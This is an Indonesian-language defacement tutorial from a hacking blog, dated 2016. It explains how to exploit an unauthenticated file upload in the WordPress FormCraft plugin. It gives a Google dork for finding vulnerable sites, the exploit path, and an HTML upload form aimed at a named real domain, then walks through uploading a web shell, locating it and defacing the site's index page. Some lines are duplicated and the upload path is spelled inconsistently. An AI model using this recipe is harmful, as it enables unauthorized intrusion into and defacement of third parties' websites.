Author : UnknownTidak ada komentar
MalaikatTersakiti jumpa lagi dengan saya admin MT pada jum'at malam ini saya tidak akan banyak cerita saya akan langsung ke topik yang akan di bahas karena admin lagi kurang sehat langsung aja ke bawah.
Bahan :
- Shell cari sendiri
- CSRF
- Dork : inurl:/wp-content/plugins/formcraft
- Exploit : /wp-content/plugins/formcraft/sile-upload/server/php/upload.php
Script CSRF :
<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Save dengan ekstensi .html
Berikut langkahnya :
1. Buka google.com lalu masukan dork diatas
2. Lalu pilih sitenya
3. Jika sudah memilih masukan exploitnya
4. Jika vuln maka tampilannya akan seperti ini
2. Lalu pilih sitenya
3. Jika sudah memilih masukan exploitnya
4. Jika vuln maka tampilannya akan seperti ini
5. Lalu buka dengan notepad script CSRF yang anda simpan tadi
6. Copy dan paste sitenya
7. Save kembali dan buka CSRF dengan browser, lalu pilih dan upload shell anda
8. Jika sukses maka tampilan akan seperti ini
9. Setelah shell sukses di upload lalu tinggal kita buka shell yang telah kita upload tadi
Tempat akses shell :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/-namashell.php
*Note : Kadang shell juga berupa random. Ex : 154897dc834ecb---aleale.php
Maka akses shellnya menjadi :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/154897dc834ecb---aleale.php
Jika Shell sudah di pasang langsung aja debas index nya seperti di bawah ini.
Sekian Tutorialnya. Selamat belajar :)
Artikel Terkait
Posted On : Kamis, 22 Desember 2016Time : 06.22